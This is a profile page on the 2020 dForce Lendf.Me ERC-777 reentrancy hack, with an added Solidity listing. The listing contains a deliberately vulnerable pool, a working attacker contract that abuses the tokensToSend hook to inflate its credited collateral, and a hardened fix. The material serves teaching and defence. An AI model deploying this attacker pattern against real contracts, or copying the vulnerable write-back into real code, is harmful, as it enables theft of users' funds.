
dForce Lending
Hacked · DeFi · born 2019 · ✝ 2020
An ERC-777 callback drained the pool, then the hacker returned it.
dForce ran a lending protocol (Lendf.Me) on Ethereum that accepted imBTC, an ERC-777 token. In April 2020 an attacker abused the token's ERC-777 transfer hook to reenter the lending contract mid-deposit and drain roughly $25M of the pool's assets.
- Peak: ~$25M stolen
- Cause: Hacked
- Year of death: 2020
☠️ Cause of death
imBTC's ERC-777 tokensToSend hook fired inside Lendf.Me's supply() before the contract had updated its own storage. The attacker called withdraw() from inside the hook, and the outer supply() then wrote back the balance it had computed before the external call, so each round the withdrawal was erased from the books. Repeating this inflated the attacker's accounted collateral far beyond anything the pool actually held, and they drew out the pool's other assets against it.
📓 Lessons left behind
- ERC-777 transfer hooks reintroduce reentrancy into code that was written for hook-free ERC-20 tokens.
- Follow checks-effects-interactions on every external call, and never write back a balance cached from before the call.
- Vet every token standard a protocol chooses to support, including callbacks it can trigger.
🌱 The idea that survived
Reentrancy guards
Cemented checks-effects-interactions and reentrancy locks as defaults when handling callback-capable tokens.
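The bug class described under cause of death, and the two lessons above (checks-effects-interactions plus a reentrancy lock), as an added illustration that is not dForce's or Lendf.Me's code. The contract names (VulnerablePool, Attacker, HardenedPool), the trimmed IERC777Like interface and the attack loop are assumptions for this example; the ERC-1820 registry call and the tokensToSend hook signature are the real ERC-777 mechanism an attacker would use.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not dForce/Lendf.Me source; contract and function names are illustrative.
// Only the ERC-20-compatible surface that ERC-777 tokens also expose is needed here.
interface IERC777Like {
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

// ERC-1820 registry: ERC-777 tokens look up hook implementers here.
interface IERC1820Registry {
    function setInterfaceImplementer(address account, bytes32 interfaceHash, address implementer) external;
}

// VULNERABLE (the Lendf.Me bug class): supply() caches the balance, makes an
// external call, then writes the cached value back, so whatever the token's
// tokensToSend hook did to pool storage in between is overwritten.
contract VulnerablePool {
    IERC777Like public immutable token;
    mapping(address => uint256) public balances;
    constructor(IERC777Like t) { token = t; }

    function supply(uint256 amount) external {
        uint256 newBalance = balances[msg.sender] + amount;                            // (1) read and cache
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom"); // (2) hook fires inside
        balances[msg.sender] = newBalance;                                             // (3) stale write-back
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient");
        balances[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount), "transfer");
    }
}

// Attacker: registers itself as its own ERC777TokensSender hook implementer.
contract Attacker {
    VulnerablePool public immutable pool;
    IERC777Like public immutable token;
    bool private armed;

    constructor(VulnerablePool p, IERC777Like t, IERC1820Registry registry) {
        pool = p;
        token = t;
        t.approve(address(p), type(uint256).max);
        registry.setInterfaceImplementer(address(this), keccak256("ERC777TokensSender"), address(this));
    }

    // Each round deposits everything we hold. Inside that deposit's transferFrom
    // the hook withdraws what the pool can give back; the pool then writes back
    // the pre-call total, so our credit grows every round while the pool's real
    // holdings never exceed the tokens we actually own.
    function attack(uint256 rounds) external {
        armed = true;
        for (uint256 i = 0; i < rounds; i++) pool.supply(token.balanceOf(address(this)));
        armed = false;
    }

    // ERC-777 sender hook: the token calls this inside transferFrom, before any
    // token balance moves and before the pool has touched its own storage.
    function tokensToSend(address, address from, address to, uint256, bytes calldata, bytes calldata) external {
        if (!armed || msg.sender != address(token) || from != address(this) || to != address(pool)) return;
        armed = false;                                        // one reentry per deposit
        uint256 credited = pool.balances(address(this));
        uint256 liquid = token.balanceOf(address(pool));      // cannot pull more than it holds
        pool.withdraw(credited < liquid ? credited : liquid);
        armed = true;
    }
}

// HARDENED: effects before the interaction, no cached balance, and a mutex so a
// hook cannot reach withdraw() while supply() is still in flight.
contract HardenedPool {
    IERC777Like public immutable token;
    mapping(address => uint256) public balances;
    uint256 private lock = 1;

    modifier nonReentrant() {
        require(lock == 1, "reentrant");
        lock = 2;
        _;
        lock = 1;
    }
    constructor(IERC777Like t) { token = t; }

    function supply(uint256 amount) external nonReentrant {
        balances[msg.sender] += amount;                                                // effect first, fresh storage
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom"); // interaction last
    }

    function withdraw(uint256 amount) external nonReentrant {
        require(balances[msg.sender] >= amount, "insufficient");
        balances[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount), "transfer");
    }
}
```

Deployed against any ERC-777 token and the ERC-1820 registry, a few rounds of attack() leave pool.balances(attacker) well above token.balanceOf(pool), which is the inflated collateral a lending protocol would then let the attacker borrow against. Against HardenedPool the same hook hits the "reentrant" require inside withdraw(), and that revert propagates back through the token and aborts the whole supply(). Note that crediting with `+=` after the call, rather than writing back a cached local, would already remove this specific bug; the lock is the backstop for any other path a hook might reach.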
#defi #lending #reentrancy #ethereum